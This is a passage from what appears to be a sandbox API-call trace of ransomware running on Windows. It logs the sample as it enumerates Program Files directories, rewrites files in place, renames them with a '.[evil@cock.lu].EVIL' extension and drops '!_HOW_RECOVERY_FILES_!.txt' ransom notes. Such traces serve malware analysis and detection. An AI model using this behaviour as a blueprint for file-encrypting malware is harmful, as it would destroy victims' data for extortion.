hTemplateFile=0x0) returned 0x1a0 [0098.596] GetFileSize (in: hFile=0x1a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2b3c6 [0098.596] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2f320a0, nNumberOfBytesToRead=0x2b3e0, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2f320a0*, lpNumberOfBytesRead=0x84b0fde1e0*=0x2b3c6, lpOverlapped=0x0) returned 1 [0098.708] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.708] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.708] _errno () returned 0x84b1160840 [0098.708] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.708] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2f320a0*, nNumberOfBytesToWrite=0x2b3e0, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2f320a0*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x2b3e0, lpOverlapped=0x0) returned 1 [0098.709] CloseHandle (hObject=0x1a0) returned 1 [0098.709] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\THIRDPARTYLICENSEREADME.txt", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0098.709] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0098.709] __uncaught_exception () returned 0x84b1160800 [0098.709] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0098.709] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\THIRDPARTYLICENSEREADME.txt" (normalized: "c:\\program files\\java\\jre1.8.0_131\\thirdpartylicensereadme.txt"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\THIRDPARTYLICENSEREADME.txt.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\thirdpartylicensereadme.txt.[evil@cock.lu].evil")) returned 1 [0098.710] ??_V@YAXPEAX@Z () returned 0x1 [0098.710] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\THIRDPARTYLICENSEREADME.txt", dwFileAttributes=0x0) returned 0 [0098.710] FindNextFileW (in: hFindFile=0x84b11ddce0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0098.710] wcsstr (_Str="Welcome.html", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0098.710] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\Welcome.html") returned 48 [0098.710] wcscmp (_String1="Welcome.html", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0098.710] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Welcome.html") returned 0x0 [0098.710] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\Welcome.html") returned 0x30 [0098.710] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\Welcome.html" (normalized: "c:\\program files\\java\\jre1.8.0_131\\welcome.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0098.712] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x3bb, lpOverlapped=0x0) returned 1 [0098.718] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.718] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.718] _errno () returned 0x84b1160840 [0098.718] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.718] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x3c0, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x3c0, lpOverlapped=0x0) returned 1 [0098.719] CloseHandle (hObject=0x1a0) returned 1 [0098.719] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\Welcome.html", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0098.719] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0098.719] __uncaught_exception () returned 0x84b1160800 [0098.719] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0098.720] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\Welcome.html" (normalized: "c:\\program files\\java\\jre1.8.0_131\\welcome.html"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\Welcome.html.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\welcome.html.[evil@cock.lu].evil")) returned 1 [0098.721] ??_V@YAXPEAX@Z () returned 0x1 [0098.724] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\Welcome.html", dwFileAttributes=0x0) returned 0 [0098.724] FindNextFileW (in: hFindFile=0x84b11ddce0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 0 [0098.725] FindClose (in: hFindFile=0x84b11ddce0 | out: hFindFile=0x84b11ddce0) returned 1 [0098.725] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131") returned 0x23 [0098.725] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0098.725] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0098.725] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0098.725] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0098.726] __uncaught_exception () returned 0x84b1160800 [0098.726] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0098.727] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0098.727] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0098.727] wcslen (_String="C:\\\\Program Files\\Java") returned 0x16 [0098.727] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0098.727] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0098.727] _wfsopen (_FileName="C:\\\\Program Files\\Java\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0098.728] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0098.728] __uncaught_exception () returned 0x84b1160800 [0098.728] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0098.728] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0098.728] wcsstr (_Str="Microsoft Office", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0098.728] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office") returned 34 [0098.729] wcscmp (_String1=".", _String2="Microsoft Office") returned -1 [0098.729] wcscmp (_String1="..", _String2="Microsoft Office") returned -1 [0098.729] wcslen (_String="C:\\\\Program Files\\Microsoft Office") returned 0x22 [0098.729] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Microsoft Office" | out: _Destination="C:\\\\Program Files\\Microsoft Office") returned 0x0 [0098.729] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\*") returned="C:\\\\Program Files\\Microsoft Office\\*" [0098.729] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Microsoft Office\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0098.729] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0098.729] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\.") returned 36 [0098.729] wcscmp (_String1=".", _String2=".") returned 0 [0098.729] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0098.729] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0098.729] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\..") returned 37 [0098.729] wcscmp (_String1=".", _String2="..") returned -1 [0098.729] wcscmp (_String1="..", _String2="..") returned 0 [0098.729] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0098.729] wcsstr (_Str="AppXManifest.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0098.729] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 51 [0098.729] wcscmp (_String1="AppXManifest.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0098.729] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.xml") returned 0x0 [0098.729] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 0x33 [0098.729] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\AppXManifest.xml" (normalized: "c:\\program files\\microsoft office\\appxmanifest.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0098.731] ReadFile (in: hFile=0x19c, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde700, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fde700*=0x100000, lpOverlapped=0x0) returned 1 [0098.743] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.743] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.743] _errno () returned 0x84b1160840 [0098.744] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.744] WriteFile (in: hFile=0x19c, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x100020, lpNumberOfBytesWritten=0x84b0fde700, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fde700*=0x100020, lpOverlapped=0x0) returned 1 [0098.752] CloseHandle (hObject=0x19c) returned 1 [0098.753] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\AppXManifest.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0098.753] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0098.753] __uncaught_exception () returned 0x84b1160800 [0098.753] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0098.754] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\AppXManifest.xml" (normalized: "c:\\program files\\microsoft office\\appxmanifest.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\AppXManifest.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\appxmanifest.xml.[evil@cock.lu].evil")) returned 1 [0098.755] ??_V@YAXPEAX@Z () returned 0x1 [0098.758] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\AppXManifest.xml", dwFileAttributes=0x0) returned 0 [0098.758] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0098.758] wcsstr (_Str="FileSystemMetadata.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0098.758] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 57 [0098.758] wcscmp (_String1="FileSystemMetadata.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0098.758] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FileSystemMetadata.xml") returned 0x0 [0098.758] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 0x39 [0098.758] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\FileSystemMetadata.xml" (normalized: "c:\\program files\\microsoft office\\filesystemmetadata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0098.760] ReadFile (in: hFile=0x19c, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde700, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fde700*=0x119, lpOverlapped=0x0) returned 1 [0098.768] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.768] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.768] _errno () returned 0x84b1160840 [0098.768] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.768] WriteFile (in: hFile=0x19c, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x84b0fde700, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fde700*=0x120, lpOverlapped=0x0) returned 1 [0098.768] CloseHandle (hObject=0x19c) returned 1 [0098.768] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\FileSystemMetadata.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0098.769] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0098.769] __uncaught_exception () returned 0x84b1160800 [0098.769] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0098.772] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\FileSystemMetadata.xml" (normalized: "c:\\program files\\microsoft office\\filesystemmetadata.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\FileSystemMetadata.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\filesystemmetadata.xml.[evil@cock.lu].evil")) returned 1 [0098.773] ??_V@YAXPEAX@Z () returned 0x1 [0098.776] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\FileSystemMetadata.xml", dwFileAttributes=0x200) returned 0 [0098.776] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0098.776] wcsstr (_Str="invision-tissue-universe-alliance.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0098.776] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\invision-tissue-universe-alliance.exe") returned 72 [0098.776] wcscmp (_String1="invision-tissue-universe-alliance.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0098.776] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="invision-tissue-universe-alliance.exe") returned 0x0 [0098.776] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\invision-tissue-universe-alliance.exe") returned 0x48 [0098.776] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\invision-tissue-universe-alliance.exe" (normalized: "c:\\program files\\microsoft office\\invision-tissue-universe-alliance.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0098.777] GetLastError () returned 0x20 [0098.777] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0098.777] wcsstr (_Str="Office16", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0098.777] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\Office16") returned 43 [0098.777] wcscmp (_String1=".", _String2="Office16") returned -1 [0098.777] wcscmp (_String1="..", _String2="Office16") returned -1 [0098.777] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\Office16") returned 0x2b [0098.777] wcscpy_s (in: _Destination=0x84b0fde690, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Microsoft Office\\Office16" | out: _Destination="C:\\\\Program Files\\Microsoft Office\\Office16") returned 0x0 [0098.777] wcscat (in: _Dest=0x84b0fde690, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\Office16\\*") returned="C:\\\\Program Files\\Microsoft Office\\Office16\\*" [0098.777] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Microsoft Office\\Office16\\*", lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 0x84b11dd980 [0098.777] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0098.777] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\Office16\\.") returned 45 [0098.777] wcscmp (_String1=".", _String2=".") returned 0 [0098.777] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0098.777] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0098.777] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\Office16\\..") returned 46 [0098.777] wcscmp (_String1=".", _String2="..") returned -1 [0098.777] wcscmp (_String1="..", _String2="..") returned 0 [0098.777] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0098.777] wcsstr (_Str="OSPP.HTM", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0098.777] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 52 [0098.777] wcscmp (_String1="OSPP.HTM", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0098.777] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="OSPP.HTM") returned 0x0 [0098.777] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 0x34 [0098.777] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0098.779] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x2a9c0, lpOverlapped=0x0) returned 1 [0099.016] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.016] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.016] _errno () returned 0x84b1160840 [0099.017] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.017] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x2a9e0, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x2a9e0, lpOverlapped=0x0) returned 1 [0099.017] CloseHandle (hObject=0x1a0) returned 1 [0099.017] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0099.017] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0099.017] __uncaught_exception () returned 0x84b1160800 [0099.017] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0099.018] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.htm"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.htm.[evil@cock.lu].evil")) returned 1 [0099.257] ??_V@YAXPEAX@Z () returned 0x1 [0099.260] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM", dwFileAttributes=0x0) returned 0 [0099.260] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0099.260] wcsstr (_Str="OSPP.VBS", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0099.260] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 52 [0099.260] wcscmp (_String1="OSPP.VBS", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0099.260] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="OSPP.VBS") returned 0x0 [0099.260] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 0x34 [0099.260] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0099.262] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x19ba6, lpOverlapped=0x0) returned 1 [0099.286] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.286] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.286] _errno () returned 0x84b1160840 [0099.286] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.286] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x19bc0, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x19bc0, lpOverlapped=0x0) returned 1 [0099.287] CloseHandle (hObject=0x1a0) returned 1 [0099.287] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0099.287] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0099.287] __uncaught_exception () returned 0x84b1160800 [0099.287] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0099.288] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.vbs"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.vbs.[evil@cock.lu].evil")) returned 1 [0099.288] ??_V@YAXPEAX@Z () returned 0x1 [0099.291] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS", dwFileAttributes=0x0) returned 0 [0099.291] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0099.291] wcsstr (_Str="OSPPREARM.EXE", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0099.291] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\Office16\\OSPPREARM.EXE") returned 57 [0099.291] wcscmp (_String1="OSPPREARM.EXE", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0099.291] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="OSPPREARM.EXE") returned 0x0 [0099.291] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\Office16\\OSPPREARM.EXE") returned 0x39 [0099.291] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Office16\\OSPPREARM.EXE" (normalized: "c:\\program files\\microsoft office\\office16\\ospprearm.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0099.292] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x362c8, lpOverlapped=0x0) returned 1 [0099.336] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.336] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.336] _errno () returned 0x84b1160840 [0099.336] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.336] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x362e0, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x362e0, lpOverlapped=0x0) returned 1 [0099.337] CloseHandle (hObject=0x1a0) returned 1 [0099.337] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\Office16\\OSPPREARM.EXE", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0099.337] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0099.337] __uncaught_exception () returned 0x84b1160800 [0099.337] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0099.337] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\Office16\\OSPPREARM.EXE" (normalized: "c:\\program files\\microsoft office\\office16\\ospprearm.exe"), lpNewFileName="C:\\\\Program Files\\Microsoft 